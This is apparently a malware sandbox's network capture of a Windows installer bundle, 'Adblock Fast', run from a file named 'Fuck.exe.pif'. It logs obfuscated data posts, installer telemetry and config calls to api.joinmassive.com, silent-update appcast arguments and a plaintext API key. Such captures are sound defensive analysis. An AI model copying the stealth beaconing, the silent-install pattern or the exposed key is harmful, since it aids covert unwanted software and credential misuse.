                                                                                                                                                                                                                                    2022-10-04 05:11:00 UTC16591OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 53 70 31 4e 53 6f 6f 4b 53 6d 65 57 56 72 59 6d 69 57 6e 35 6c 6c 65 48 75 6d 33 71 53 6d 6d 59 79 6d 6f 4b 53 6d 65 47 64 6f 5a 36 62 65 70 4a 47 6d 61 57 68 6e 61 48 75 6d 33 71 53 72 6b 36 43 6b 70 6d 40 55 70 74 36 6b 70 74 66 55 31 71 4c 58 31 74 40 69 31 36 69 70 6f 74 66 63 70 71 43 6b 70 6d 4e 6e 65 57 78 76 59 6e 74 76 65 4b 62 65 70 4b 61 74 72 64 53 70 31 4e 40 74 71 74 7a 57 68 71 72 63 31 36 32 74 31 71 71 62 72 61 32 61 71 49 61 71 33 4e 61 6f 68 36 69 74 6d 71 61 67 70 4b 5a 6a 61 6e 75 57 70 74 36 6b 70 74 40 69 33 36 61 67 70 4b 61 57 65 33 31 76 5a 57 4b 6d 33 71 53 6d 76 70 32 6d 6f 4b 53 6d 61 4a 40 55 65 36 62 65 70 4b 75 67 70 4b 5a 71 65 35 61 6d 33 71 53 70 31 70 4d 3d
                                                                                                                                                                                                                                    Data Ascii: p=kaZ5bGdiYntgb3im3qSp1NSooKSmeWVrYmiWn5lleHum3qSmmYymoKSmeGdoZ6bepJGmaWhnaHum3qSrk6Ckpm@Upt6kptfU1qLX1t@i16ipotfcpqCkpmNneWxvYntveKbepKatrdSp1N@tqtzWhqrc162t1qqbra2aqIaq3Naoh6itmqagpKZjanuWpt6kpt@i36agpKaWe31vZWKm3qSmvp2moKSmaJ@Ue6bepKugpKZqe5am3qSp1pM=
                                                                                                                                                                                                                                    2022-10-04 05:11:01 UTC16591INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:11:01 GMT
                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2y06sG0HcpmhLKC9Pd6b6rVy4oyGxhthZRMi4nxtCo4EGPFEB7BueOuGGFIAvBH%2FupXDZr8gH45gAE4EFvdZA9CqDgZVdQix7wxcsozANiJaVjhMuv8v1609VQblpIkqjvcIfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 754b6a159e2290ba-FRA
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                    2022-10-04 05:11:01 UTC16592INData Raw: 34 65 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 2c 22 63 6b 22 3a 5b 5d 2c 22 69 6e 73 63 6b 22 3a 5b 5d 7d 7d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 4e{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1,"ck":[],"insck":[]}}
                                                                                                                                                                                                                                    2022-10-04 05:11:01 UTC16592INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    16192.168.11.204987013.32.99.56443C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:11:04 UTC16592OUTPOST /telemetry?source=installer&env=prod HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json; Charset=UTF-8
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    User-Agent: InnoSetup
                                                                                                                                                                                                                                    x-api-key: vdHv1LwOhm9xuH340hel68pg6cW5X5T96CjMZrof
                                                                                                                                                                                                                                    Content-Length: 289
                                                                                                                                                                                                                                    Host: api.joinmassive.com
                                                                                                                                                                                                                                    2022-10-04 05:11:04 UTC16592OUTData Raw: 7b 22 40 74 69 6d 65 73 74 61 6d 70 22 3a 31 36 36 34 38 36 33 39 32 34 30 30 30 2c 20 22 69 6e 66 6f 22 3a 7b 22 61 6e 6f 6e 49 64 22 3a 22 31 31 33 38 39 34 30 36 2d 30 33 37 37 2d 34 37 65 64 2d 39 38 63 37 2d 64 35 36 34 65 36 38 33 63 36 65 62 22 2c 22 74 79 70 65 22 3a 22 53 75 63 63 65 73 73 22 2c 22 6e 61 6d 65 22 3a 22 49 6e 73 74 61 6c 6c 43 6f 6d 70 53 75 63 63 65 73 73 22 2c 22 70 72 6f 64 75 63 74 49 64 22 3a 22 41 64 62 6c 6f 63 6b 49 6e 73 74 61 6c 6c 65 72 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 31 31 33 38 39 34 30 36 31 36 36 34 38 36 33 38 31 35 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 34 2e 30 22 7d 2c 20 22 64 61 74 61 22 3a 7b 22 63 6f 6d 70 6f 6e 65 6e 74 22 3a 22 56 43 52 65 64 69 73 74 22 2c 20 22 76 65 72 73 69 6f 6e 22
                                                                                                                                                                                                                                    Data Ascii: {"@timestamp":1664863924000, "info":{"anonId":"11389406-0377-47ed-98c7-d564e683c6eb","type":"Success","name":"InstallCompSuccess","productId":"AdblockInstaller","sessionId":"113894061664863815","version":"2.4.0"}, "data":{"component":"VCRedist", "version"
                                                                                                                                                                                                                                    2022-10-04 05:11:05 UTC16593INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Content-Length: 20
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:11:05 GMT
                                                                                                                                                                                                                                    x-amzn-RequestId: 4aed438b-dfe5-49a5-8a8d-0871367490a8
                                                                                                                                                                                                                                    x-amz-apigw-id: ZdsAeF8VIAMFgDA=
                                                                                                                                                                                                                                    X-Amzn-Trace-Id: Root=1-633bc069-7162ac20479fa8e47bb95a82
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 8b889e35789d2b97f2ba8771acc9a008.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: FRA60-P3
                                                                                                                                                                                                                                    X-Amz-Cf-Id: BuwadRMcFpJ-joGLT2IB2ZKnYx_4uKmg8aFEVV-F8iVgxef9RPWeVQ==
                                                                                                                                                                                                                                    2022-10-04 05:11:05 UTC16593INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 53 75 63 63 65 73 73 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"status":"Success"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    17192.168.11.204987713.32.99.56443C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:11:12 UTC16593OUTGET /apps/config?productId=adblockfast&distId=marketator&anonId=11389406-0377-47ed-98c7-d564e683c6eb HTTP/1.1
                                                                                                                                                                                                                                    Host: api.joinmassive.com
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    x-api-key: vdHv1LwOhm9xuH340hel68pg6cW5X5T96CjMZrof
                                                                                                                                                                                                                                    2022-10-04 05:11:12 UTC16593INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Content-Length: 496
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:11:12 GMT
                                                                                                                                                                                                                                    x-amzn-RequestId: 6ba5db9c-ad0b-4dc6-ad52-c2885deee0ac
                                                                                                                                                                                                                                    x-amz-apigw-id: ZdsBnFJBIAMF_1Q=
                                                                                                                                                                                                                                    X-Amzn-Trace-Id: Root=1-633bc070-7603c4101e039d3c0fe54077;Sampled=0
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 d262e104d5d9dd6a4a52f090bdf9395c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: FRA60-P3
                                                                                                                                                                                                                                    X-Amz-Cf-Id: dAS36cH9nIOUr7hf0r3xd-48IgaGOP-fqIApCd7JcyS1vCPhN074EQ==
                                                                                                                                                                                                                                    2022-10-04 05:11:12 UTC16594INData Raw: 7b 22 64 69 73 74 49 64 22 3a 22 6d 61 72 6b 65 74 61 74 6f 72 22 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 75 70 64 61 74 65 22 3a 7b 22 61 70 70 43 61 73 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6d 70 75 74 65 77 61 6c 6c 2e 63 6f 6d 2f 61 64 62 6c 6f 63 6b 66 61 73 74 2f 6d 61 72 6b 65 74 61 74 6f 72 2f 77 69 6e 64 6f 77 73 2f 61 70 70 63 61 73 74 2e 78 6d 6c 22 7d 2c 22 65 78 74 72 61 22 3a 7b 22 62 6c 6f 63 6b 6c 69 73 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6d 70 75 74 65 77 61 6c 6c 2e 63 6f 6d 2f 61 64 62 6c 6f 63 6b 66 61 73 74 2f 70 72 6f 64 2f 69 70 73 2e 74 78 74 22 2c 22 73 65 6e 74 72 79 44 73 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 30 36 37 39 38 65 39 39 64 37 65 65 34 31 36 66 61 61 66 34 65 30 31 63 64
                                                                                                                                                                                                                                    Data Ascii: {"distId":"marketator","config":{"update":{"appCastUrl":"https://cdn.computewall.com/adblockfast/marketator/windows/appcast.xml"},"extra":{"blocklistUrl":"https://cdn.computewall.com/adblockfast/prod/ips.txt","sentryDsn":"https://06798e99d7ee416faaf4e01cd


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    18192.168.11.204988113.32.99.56443C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:11:12 UTC16594OUTPOST /telemetry?source=installer&env=prod HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json; Charset=UTF-8
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    User-Agent: InnoSetup
                                                                                                                                                                                                                                    x-api-key: vdHv1LwOhm9xuH340hel68pg6cW5X5T96CjMZrof
                                                                                                                                                                                                                                    Content-Length: 287
                                                                                                                                                                                                                                    Host: api.joinmassive.com
                                                                                                                                                                                                                                    2022-10-04 05:11:12 UTC16595OUTData Raw: 7b 22 40 74 69 6d 65 73 74 61 6d 70 22 3a 31 36 36 34 38 36 33 39 36 32 30 30 30 2c 20 22 69 6e 66 6f 22 3a 7b 22 61 6e 6f 6e 49 64 22 3a 22 31 31 33 38 39 34 30 36 2d 30 33 37 37 2d 34 37 65 64 2d 39 38 63 37 2d 64 35 36 34 65 36 38 33 63 36 65 62 22 2c 22 74 79 70 65 22 3a 22 49 6e 66 6f 22 2c 22 6e 61 6d 65 22 3a 22 49 6e 73 74 61 6c 6c 65 72 43 6f 6d 70 6c 65 74 65 22 2c 22 70 72 6f 64 75 63 74 49 64 22 3a 22 41 64 62 6c 6f 63 6b 49 6e 73 74 61 6c 6c 65 72 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 31 31 33 38 39 34 30 36 31 36 36 34 38 36 33 38 31 35 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 34 2e 30 22 7d 2c 20 22 64 61 74 61 22 3a 7b 22 69 73 55 70 64 61 74 65 22 3a 66 61 6c 73 65 2c 20 22 73 6f 75 72 63 65 22 3a 22 55 41 2d 31 33 35 36 39 30
                                                                                                                                                                                                                                    Data Ascii: {"@timestamp":1664863962000, "info":{"anonId":"11389406-0377-47ed-98c7-d564e683c6eb","type":"Info","name":"InstallerComplete","productId":"AdblockInstaller","sessionId":"113894061664863815","version":"2.4.0"}, "data":{"isUpdate":false, "source":"UA-135690
                                                                                                                                                                                                                                    2022-10-04 05:11:12 UTC16595INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Content-Length: 20
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:11:12 GMT
                                                                                                                                                                                                                                    x-amzn-RequestId: 12c9b3fe-76fa-4c8a-89b5-cf94d9c7ce16
                                                                                                                                                                                                                                    x-amz-apigw-id: ZdsBpGpUoAMFTDA=
                                                                                                                                                                                                                                    X-Amzn-Trace-Id: Root=1-633bc070-7843ef70261ffe50251c244b
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 544814e402956ba93c0a2d2b923e94c2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: FRA60-P3
                                                                                                                                                                                                                                    X-Amz-Cf-Id: LCo26-4zhV0nPuMO1M4_26BUkxY47j_RtW2KgWRD08vqANe6lrOERg==
                                                                                                                                                                                                                                    2022-10-04 05:11:12 UTC16596INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 53 75 63 63 65 73 73 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"status":"Success"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    19192.168.11.204988013.32.99.56443C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:11:12 UTC16595OUTGET /dist/match?productId=adblockfast&distId=marketator&downloadDate=2022-10-04T06%3A10%3A07&anonId=11389406-0377-47ed-98c7-d564e683c6eb&installerSessionId=113894061664863815&pid=767&installType=installPath HTTP/1.1
                                                                                                                                                                                                                                    Host: api.joinmassive.com
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    x-api-key: vdHv1LwOhm9xuH340hel68pg6cW5X5T96CjMZrof
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16596INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Content-Length: 378
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:11:12 GMT
                                                                                                                                                                                                                                    x-amzn-RequestId: 94a26de8-d86b-41e5-9a6c-7c75064b1657
                                                                                                                                                                                                                                    x-amz-apigw-id: ZdsBrFYBIAMF15g=
                                                                                                                                                                                                                                    X-Amzn-Trace-Id: Root=1-633bc070-29934c107f128bff76651f9f;Sampled=0
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 efb4ddf9650598b987ef5db782c5b530.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: FRA60-P3
                                                                                                                                                                                                                                    X-Amz-Cf-Id: kDXjedxp2xkkEOOqAWsL04r0puTY3TWsIe_zkOr5Y8aSSmWCyNm1Kg==
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16596INData Raw: 7b 22 73 75 62 44 69 73 74 49 64 22 3a 22 22 2c 22 70 72 6f 64 75 63 74 49 64 22 3a 22 61 64 62 6c 6f 63 6b 66 61 73 74 22 2c 22 64 69 73 74 49 64 22 3a 22 6d 61 72 6b 65 74 61 74 6f 72 22 2c 22 69 6e 73 74 61 6c 6c 54 79 70 65 22 3a 22 69 6e 73 74 61 6c 6c 50 61 74 68 22 2c 22 63 6c 69 63 6b 44 61 74 65 22 3a 30 2c 22 69 6e 73 74 61 6c 6c 44 61 74 65 22 3a 30 2c 22 69 6e 73 74 61 6c 6c 65 72 53 65 73 73 69 6f 6e 49 64 22 3a 22 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 70 75 62 6c 69 73 68 65 72 49 64 22 3a 22 37 36 37 22 2c 22 63 61 6d 70 61 69 67 6e 49 64 22 3a 22 30 22 2c 22 63 64 6e 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6d 70 75 74 65 77 61 6c 6c 2e 63 6f 6d 2f 61 64 62 6c 6f 63 6b 66 61 73 74 2f 6d 61 72 6b 65 74 61 74 6f 72 2f 77
                                                                                                                                                                                                                                    Data Ascii: {"subDistId":"","productId":"adblockfast","distId":"marketator","installType":"installPath","clickDate":0,"installDate":0,"installerSessionId":"","params":{"publisherId":"767","campaignId":"0","cdnUrl":"https://cdn.computewall.com/adblockfast/marketator/w


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    2192.168.11.204983813.32.99.56443C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:10:16 UTC15973OUTPOST /telemetry?source=installer&env=prod HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json; Charset=UTF-8
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    User-Agent: InnoSetup
                                                                                                                                                                                                                                    x-api-key: vdHv1LwOhm9xuH340hel68pg6cW5X5T96CjMZrof
                                                                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                                                                    Host: api.joinmassive.com
                                                                                                                                                                                                                                    2022-10-04 05:10:16 UTC15974OUTData Raw: 7b 22 40 74 69 6d 65 73 74 61 6d 70 22 3a 31 36 36 34 38 36 33 38 31 35 30 30 30 2c 20 22 69 6e 66 6f 22 3a 7b 22 61 6e 6f 6e 49 64 22 3a 22 31 31 33 38 39 34 30 36 2d 30 33 37 37 2d 34 37 65 64 2d 39 38 63 37 2d 64 35 36 34 65 36 38 33 63 36 65 62 22 2c 22 74 79 70 65 22 3a 22 49 6e 66 6f 22 2c 22 6e 61 6d 65 22 3a 22 49 6e 73 74 61 6c 6c 65 72 53 74 61 72 74 22 2c 22 70 72 6f 64 75 63 74 49 64 22 3a 22 41 64 62 6c 6f 63 6b 49 6e 73 74 61 6c 6c 65 72 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 31 31 33 38 39 34 30 36 31 36 36 34 38 36 33 38 31 35 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 34 2e 30 22 7d 2c 20 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 32 2e 33 22 2c 20 22 64 6f 77 6e 6c 6f 61 64 44 61 74 65 22 3a 22 32 30 32 32 2d
                                                                                                                                                                                                                                    Data Ascii: {"@timestamp":1664863815000, "info":{"anonId":"11389406-0377-47ed-98c7-d564e683c6eb","type":"Info","name":"InstallerStart","productId":"AdblockInstaller","sessionId":"113894061664863815","version":"2.4.0"}, "data":{"version":"0.2.3", "downloadDate":"2022-
                                                                                                                                                                                                                                    2022-10-04 05:10:16 UTC15974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Content-Length: 20
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:10:16 GMT
                                                                                                                                                                                                                                    x-amzn-RequestId: a4fcc0d3-615c-410a-9a52-c3ccd4d744cf
                                                                                                                                                                                                                                    x-amz-apigw-id: Zdr41FObIAMF5jA=
                                                                                                                                                                                                                                    X-Amzn-Trace-Id: Root=1-633bc038-443e1a5e375e09c90ca43a0e
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 372875ad1ec20daf24f3f29f14a73cd0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: FRA60-P3
                                                                                                                                                                                                                                    X-Amz-Cf-Id: _-mGIc4JNQwrebHLsJkuGm7vgXWURfJgQzyXjvR3HiJ6PBHLR8WyHg==
                                                                                                                                                                                                                                    2022-10-04 05:10:16 UTC15975INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 53 75 63 63 65 73 73 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"status":"Success"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    20192.168.11.2049882172.67.68.80443C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16597OUTGET /adblockfast/marketator/windows/appcast.xml HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Adblock/0.2.3 WinSparkle/0.7.0 (Win64)
                                                                                                                                                                                                                                    Host: cdn.computewall.com
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16597INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:11:13 GMT
                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                    Content-Length: 1066
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    x-amz-id-2: +V/e6oCT8/Km8ds6ALadNUygwNScyv5oXGwRHJ+ti60uJdyFwIQpBmHUq5U9/KkiO1av1rD2o8g=
                                                                                                                                                                                                                                    x-amz-request-id: KAEWSZN2YNRSBDEY
                                                                                                                                                                                                                                    Last-Modified: Fri, 16 Sep 2022 13:35:48 GMT
                                                                                                                                                                                                                                    ETag: "cf998655e55984e5da51a16763754749"
                                                                                                                                                                                                                                    Cache-Control: max-age=86400
                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                    Age: 5493
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rFjPvEmyu0q7%2BpnD5fbg1UTxTQjQ%2Fg%2BYUUmlegqgEn4817qT%2B9qL7HyEfnmf5DPWTC4i2qyj7UNrssnvWOnlonwQhue9p55vD%2BWOIkuFjRa29ESOk7CiCvp7WtOCft9bCp2nkFM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 754b6a62d9656934-FRA
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16598INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 49 53 4f 2d 38 38 35 39 2d 31 22 3f 3e 0d 0a 3c 72 73 73 20 78 6d 6c 6e 73 3a 73 70 61 72 6b 6c 65 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6e 64 79 6d 61 74 75 73 63 68 61 6b 2e 6f 72 67 2f 78 6d 6c 2d 6e 61 6d 65 73 70 61 63 65 73 2f 73 70 61 72 6b 6c 65 22 20 76 65 72 73 69 6f 6e 3d 22 32 2e 30 22 3e 0d 0a 20 20 20 20 3c 63 68 61 6e 6e 65 6c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 64 62 6c 6f 63 6b 20 46 61 73 74 20 66 6f 72 20 57 69 6e 64 6f 77 73 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 3e 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6d 70 75 74 65 77 61 6c 6c 2e 63 6f 6d 2f 61 64 62 6c 6f 63 6b 66 61 73 74 2f 6d 61 72
                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="ISO-8859-1"?><rss xmlns:sparkle="http://www.andymatuschak.org/xml-namespaces/sparkle" version="2.0"> <channel> <title>Adblock Fast for Windows</title> <link>https://cdn.computewall.com/adblockfast/mar
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16598INData Raw: 20 20 73 70 61 72 6b 6c 65 3a 76 65 72 73 69 6f 6e 3d 22 30 2e 33 2e 32 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 6e 67 74 68 3d 22 30 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 72 6b 6c 65 3a 6f 73 3d 22 77 69 6e 64 6f 77 73 2d 36 34 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 72 6b 6c 65 3a 69 6e 73 74 61 6c 6c 65 72 41 72 67 75 6d 65 6e 74 73 3d 22 2f 53 50 2d 20 2f 56 45 52 59 53 49 4c 45 4e 54 20 2f 4e 4f 49 43 4f 4e 53 20 2f 53 55 50 50 52 45 53 53 4d 53 47 42 4f 58 45 53 20 2f 55 50 44 41 54 45 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                    Data Ascii: sparkle:version="0.3.2" length="0" type="application/octet-stream" sparkle:os="windows-64" sparkle:installerArguments="/SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE"


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    21192.168.11.2049883172.67.68.80443C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16597OUTGET /adblockfast/marketator/windows/appcast.xml HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Adblock/0.2.3 WinSparkle/0.7.0 (Win64)
                                                                                                                                                                                                                                    Host: cdn.computewall.com
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16599INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:11:13 GMT
                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                    Content-Length: 1066
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    x-amz-id-2: +V/e6oCT8/Km8ds6ALadNUygwNScyv5oXGwRHJ+ti60uJdyFwIQpBmHUq5U9/KkiO1av1rD2o8g=
                                                                                                                                                                                                                                    x-amz-request-id: KAEWSZN2YNRSBDEY
                                                                                                                                                                                                                                    Last-Modified: Fri, 16 Sep 2022 13:35:48 GMT
                                                                                                                                                                                                                                    ETag: "cf998655e55984e5da51a16763754749"
                                                                                                                                                                                                                                    Cache-Control: max-age=86400
                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                    Age: 5493
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ux0XdAcvpt9CRBQWVnsXHg2qD8XyFiwUDoD8CmVIKYT2TEzXPKZQb%2FU7hTT%2FKcQMsDtcEdh%2F2IGvXaVVPwW1rTd8rb8fVGxwWWBxPIooDicFHV1cvvT0I9X%2FYbBqQC8ZxJV0ck4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 754b6a62ebb99a1e-FRA
